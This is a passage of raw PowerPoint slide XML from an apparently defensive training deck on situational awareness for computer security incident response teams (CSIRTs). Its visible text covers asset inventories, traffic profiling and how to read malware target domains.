                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Spam</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="CAD7CA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Determine if any new campaigns appear, if targets are related to your constituency, and if malware is used—is it any new family or variant.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="CAD7CA"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1681450438"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1015885">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="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Spot a domain in malware configuration</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="E6ECE7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="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If a bank domain and the configuration tells bots to intercept traffic, you can imagine that the attackers </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="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br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="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are after the users' money. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="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If you see .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>gov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="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 targets on the list, it might be </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="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br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="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something different.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="E6ECE7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3933189182"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7630C578-2A93-404F-B03A-7BD7BB8952CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internal Situational Awareness for Organizational CSIRTs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56322" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA0D95A-F312-AC44-81B2-B5DF77B8B91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3816350" y="1328738"/>
            <a:ext cx="4711700" cy="430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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Develop complete and current asset list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Servers and individual computers, as well as network-connected door locks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network devices, address assignments, topology, routing and external connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operating systems and applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Databases and other sources of information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data of relative importance to business operations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Existing integrated inventory management system </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56323" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F317E89-B3B1-A44F-8EB4-FF3429C463A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4513" y="1762125"/>
            <a:ext cx="2343150" cy="15621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6324" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FF8156-ABCC-DD4F-BE1B-D762DBABA05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1238" y="3324225"/>
            <a:ext cx="2363787" cy="157638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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25EBF0D6-333C-B44E-B64A-DECDFBBF6F89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Internal Situational Awareness for Organizational CSIRTs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58370" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB9D9A8-93BE-0747-A355-B1CF5710EF85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3816350" y="1301750"/>
            <a:ext cx="4413250" cy="4210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Lst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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14000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Perform continual profiling and adjustment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Collect data on network traffic, system, and application usage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Quickly spot anomalies from previously known state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Judge whether deviations are malicious or benign</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58371" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3529128-DEE5-F644-A595-11BC1E1282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4513" y="1762125"/>
            <a:ext cx="2343150" cy="15621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8372" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9CD7C2E-2038-4446-9F73-FF8E903839E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1238" y="3324225"/>
            <a:ext cx="2363787" cy="157638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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{441EC589-F352-9249-8475-AD66ADAD9EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>National CSIRTs’ Internal Situational Awareness Is Different</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60418" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08EF8F98-1C98-B747-B10F-1E5C587E5BD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="430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29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1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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2pPr>
            <a:lvl3pPr marL="804863" indent="-460375">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All CSIRTs with external constituencies such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Governmental, national, and regional CSIRTs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="2" indent="-285750" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="94000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
